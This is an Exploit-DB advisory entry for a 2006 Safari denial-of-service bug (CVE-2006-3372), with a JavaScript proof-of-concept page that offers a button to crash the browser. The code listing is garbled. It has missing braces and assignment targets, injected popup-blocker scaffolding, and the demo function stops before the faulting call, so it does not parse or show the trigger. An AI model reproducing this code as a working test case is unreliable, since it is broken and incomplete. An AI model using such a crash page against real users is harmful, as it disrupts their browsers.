Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode Null Dereference Denial of Service Vulnerability

ID EDB-ID:28165
Type exploitdb
Reporter Dennis Cox
Modified 2006-07-05T00:00:00


Apple Safari Web Browser 2.0.4 DHTML SetAttributeNode() Null Dereference Denial of Service Vulnerability. CVE-2006-3372. DoS exploit for the OS X platform.


Apple Safari web browser is prone to a denial-of-service vulnerability when parsing certain malformed DHTML elements.

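An attacker can exploit this issue to crash an affected browser. The title describes the fault as a null dereference, and the advisory claims no impact beyond denial of service.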

<script language="JavaScript">

// NOTE(review): the Sym* identifiers in this block look like popup-blocker
// scaffolding that client-side security software injected into the saved page,
// not part of the demonstration itself — confirm against the original advisory.
// The listing is extraction-damaged: function bodies have lost their braces and
// two assignments have lost a side, so it does not parse as written.

// Error handler that always returns true. Once installed as window.onerror
// (below), a true return suppresses the browser's default script-error report.
function SymError()
  return true;

window.onerror = SymError;

// Right-hand side lost in extraction; presumably saved the original
// window-opening function so it could be restored later — TODO confirm.
var SymRealWinOpen =;

// Stand-in that returns an empty object instead of opening a window.
// The target of the assignment on the closing line is missing from this copy.
function SymWinOpen(url, name, attributes)
  return (new Object());
} = SymWinOpen;



// MoBB (Month of Browser Bugs) demonstration.
// NOTE(review): this copy of Demo() is truncated. Only the creation of the
// anchor element survives; the SetAttributeNode() call named in the advisory
// title and the closing brace are absent, so this listing alone does not show
// the faulting call. Refer to the vendor fix for CVE-2006-3372 rather than
// treating this fragment as a complete test case.
function Demo() {
	// Creates a detached <a> element; nothing else from the body is present here.
	var a = document.createElement("a");


Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


<script language="JavaScript">
// NOTE(review): load/unload hook chaining that appears to belong to the same
// injected Sym* scaffolding, not to the demonstration — confirm against the
// original advisory. Extraction dropped braces, at least one call, and the
// left-hand side of two assignments, so this block does not parse as written.

// Slots for whatever onload / onunload handlers the page had before hooking.
var SymRealOnLoad;
var SymRealOnUnload;

// Unload hook. The null check suggests it forwards to the saved onunload
// handler, but the forwarding call is missing from this copy.
function SymOnUnload()
{ = SymWinOpen;
  if(SymRealOnUnload != null)

// Load hook: calls the saved onload handler when one exists, then saves the
// page's current onunload handler and installs SymOnUnload in its place.
function SymOnLoad()
  if(SymRealOnLoad != null)
     SymRealOnLoad(); = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;

// Save the existing onload handler, then route load events through SymOnLoad.
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;